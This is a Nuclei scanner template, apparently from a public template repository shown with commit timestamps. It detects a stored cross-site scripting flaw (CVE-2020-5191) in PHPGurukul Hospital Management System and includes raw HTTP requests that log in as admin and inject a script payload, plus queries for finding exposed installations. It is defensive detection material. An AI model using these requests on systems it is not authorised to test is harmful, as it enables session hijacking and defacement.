nuclei-templates/http/cves/2020/CVE-2020-5191.yaml

69 lines
2.5 KiB
YAML
Raw Normal View History

2022-08-27 06:09:36 +00:00
id: CVE-2020-5191
2022-08-27 14:09:13 +00:00
2022-08-27 06:09:36 +00:00
info:
name: PHPGurukul Hospital Management System - Cross-Site Scripting
2022-08-27 06:09:36 +00:00
author: TenBird
2022-08-27 14:09:13 +00:00
severity: medium
description: |
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2022-08-27 06:09:36 +00:00
reference:
2022-08-27 14:09:13 +00:00
- https://www.exploit-db.com/exploits/47841
- https://phpgurukul.com/hospital-management-system-in-php/
- https://nvd.nist.gov/vuln/detail/CVE-2020-5191
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-08-27 06:09:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-08-27 06:09:36 +00:00
cve-id: CVE-2020-5191
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.00345
2024-05-31 19:23:20 +00:00
epss-percentile: 0.71585
cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*
2022-08-27 14:09:13 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:22:36 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: phpgurukul
product: hospital_management_system
2024-05-31 19:23:20 +00:00
shodan-query: http.html:"hospital management system"
fofa-query: body="hospital management system"
2024-01-14 09:21:50 +00:00
tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul
2022-08-27 06:09:36 +00:00
http:
2022-08-27 06:09:36 +00:00
- raw:
- |
POST /hospital/hms/admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-27 14:09:13 +00:00
2022-08-27 06:12:21 +00:00
username={{username}}&password={{password}}&submit=&submit=
2022-08-27 06:09:36 +00:00
- |
POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-27 14:09:13 +00:00
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
2022-08-27 06:09:36 +00:00
host-redirects: true
2022-08-27 14:09:13 +00:00
max-redirects: 2
2023-07-11 19:49:27 +00:00
2022-08-27 06:09:36 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-30 05:45:06 +00:00
- '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
2022-08-27 14:09:13 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100b9404523326339c17c3ff71746265c334d58e211cc335c15fa895b7d6613e1e70220766d0544c32d0e7505acadaeda515a40c27c809b20e054a1b359ac3839c6ae8b:922c64590222798bb761d5b6d8e72950